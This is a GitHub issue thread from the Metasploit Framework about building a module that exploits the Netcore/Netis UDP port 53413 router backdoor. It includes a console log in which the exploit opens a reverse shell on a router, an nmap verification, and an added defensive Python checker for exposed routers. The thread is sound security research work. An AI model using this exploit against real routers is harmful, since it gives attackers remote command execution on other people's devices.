rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

add netcore udp 53413 backdoor #6876

Closed nixawk closed 8 years ago

nixawk commented 8 years ago

http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/ https://www.seebug.org/vuldb/ssvid-90227

I will try to add a new module to exploit the backdoor.

h00die commented 8 years ago

Edit: Just purchased a WF2414, will be here Tuesday. I volunteer to get this module done.

nixawk commented 8 years ago

@h00die is your router produced by netcore/netis?

h00die commented 8 years ago

netis WF2414 http://www.netis-systems.com/en/products/Wireless-Routers-Regular/64.html

h00die commented 8 years ago

Device should be in next week. In the meantime, I've started the module here: https://github.com/h00die/metasploit-framework/commit/713a061bffea6efc35fe49ce9d82dc1d0d73d1a1 The TrendMicro post says there is a hardcoded password in the firmware; haven't found a site that has what the password is. Anyone want to find that?

h00die commented 8 years ago

https://www.exploit-db.com/exploits/38470/ may contain one of the creds

h00die commented 8 years ago

for WF2414, looks like netis(WF2414)-V1.4.29433 is the patched version, netis(WF2414)-V1.4.27001 should be vulnerable, and is available.

nixawk commented 8 years ago

@h00die I've created a module as follows.

msf exploit(netcore_udp_53413_backdoor) > info

       Name: Netcore Udp 53413 Backdoor
     Module: exploit/linux/misc/netcore_udp_53413_backdoor
   Platform:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-08-25

Provided by:
  Nixawk

Available targets:
  Id  Name
  --  ----
  0   MIPS Little Endian
  1   MIPS Big Endian

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.1.1      yes       The target address
  RPORT    53413            yes       The target port
  TIMEOUT  1000             yes       The socket connect timeout in milliseconds

Payload information:

Description:
  Routers manufactured by Netcore, a popular brand for networking
  equipment in China, have a wide-open backdoor that can be fairly
  easily exploited by attackers. These products are also sold under
  the Netis brand name outside of China. This backdoor allows
  cybercriminals to easily run arbitrary code on these routers,
  rendering it vulnerable as a security device.

References:
  https://www.seebug.org/vuldb/ssvid-90227
  http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/

msf exploit(netcore_udp_53413_backdoor) > show options

Module options (exploit/linux/misc/netcore_udp_53413_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    53413            yes       The target port
   TIMEOUT  1000             yes       The socket connect timeout in milliseconds

Exploit target:

   Id  Name
   --  ----
   0   MIPS Little Endian

msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netcore_udp_53413_backdoor) > check
[+] The target is vulnerable.
msf exploit(netcore_udp_53413_backdoor) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Exploiting...
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[*] Command Stager progress -  50.16% done (784/1563 bytes)
[*] Command Stager progress -  62.70% done (980/1563 bytes)
[*] Command Stager progress -  75.24% done (1176/1563 bytes)
[*] Command Stager progress -  87.78% done (1372/1563 bytes)
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500

pwd
/
ls
bin
cfg
dev
etc
lib
linuxrc
log
proc
sbin
sh
sys
tmp
usr
var
web

h00die commented 8 years ago

Source code?

nixawk commented 8 years ago

I'll make the code clear and give a module PR.

nixawk commented 8 years ago

https://github.com/rapid7/metasploit-framework/pull/6880

h00die commented 8 years ago

Wifi router is in, WF2414. Downgraded to Netis(WF2414)-V1.4.27001,2014.05.07 16:10

Ran nmap to verify the downgrade is vuln:

h00die@kali:~# nmap -sV -sU -p 53413 192.168.1.1
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-18 21:11 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0023s latency).
PORT      STATE SERVICE VERSION
53413/udp open  xdmcp   XDMCP (unwilling; status: .Login:)
MAC Address: 04:8D:38:XX:XX:XX (Netcore Technology)

which is exactly what it says on the disclosure, so it looks solid.
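As an added example (not part of this issue or of the Metasploit module), a defender's inventory check in the spirit of the nmap verification above: it parses nmap's normal output for several hosts and flags the ones where 53413/udp actually answered on hardware with the Netcore OUI seen in that scan, while treating nmap's "open|filtered" UDP result as inconclusive rather than as evidence of a patch. The scan text, MAC addresses and IPs below are constructed, not from a real scan.

```python
import re

# Constructed nmap normal-format output for three hosts (not a real scan):
# a confirmed-open backdoor port on Netcore hardware, an inconclusive
# open|filtered UDP result, and a non-Netcore host with the port closed.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.1.1
PORT      STATE SERVICE VERSION
53413/udp open  xdmcp   XDMCP (unwilling; status: .Login:)
MAC Address: 04:8D:38:AA:BB:CC (Netcore Technology)

Nmap scan report for 192.168.1.7
PORT      STATE         SERVICE VERSION
53413/udp open|filtered unknown
MAC Address: 04:8D:38:DD:EE:FF (Netcore Technology)

Nmap scan report for 192.168.1.20
PORT      STATE  SERVICE VERSION
53413/udp closed unknown
MAC Address: 00:11:22:33:44:55 (Example Vendor)
"""

BACKDOOR_PORT = "53413/udp"
NETCORE_OUI = "04:8D:38"  # vendor prefix seen in the issue's scan output
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+/udp)\s+(\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-F:]{17}) \((.*)\)")

def parse_hosts(text):
    """Split nmap normal output into per-host dicts: ip, port states, mac, vendor."""
    hosts, cur = [], None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            cur = {"ip": m.group(1), "ports": {}, "mac": None, "vendor": None}
            hosts.append(cur)
        elif cur and (m := PORT_RE.match(line)):
            cur["ports"][m.group(1)] = m.group(2)
        elif cur and (m := MAC_RE.match(line)):
            cur["mac"], cur["vendor"] = m.group(1), m.group(2)
    return hosts

def classify(host):
    """'exposed', 'review', 'inconclusive' or 'clear' for the 53413/udp backdoor port."""
    state = host["ports"].get(BACKDOOR_PORT, "closed")
    netcore = (host["mac"] or "").upper().startswith(NETCORE_OUI)
    if state == "open":
        return "exposed" if netcore else "review"  # answered, but vendor unconfirmed
    if state == "open|filtered":
        return "inconclusive"  # no UDP reply; silence is not evidence of a patch
    return "clear"
```

Run it against the output of `nmap -sV -sU -p 53413` over your own router subnet; only "exposed" hosts are confirmed, and "inconclusive" ones need a firmware-version check rather than being assumed patched.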

bcook-r7 commented 8 years ago

This appears to be resolved.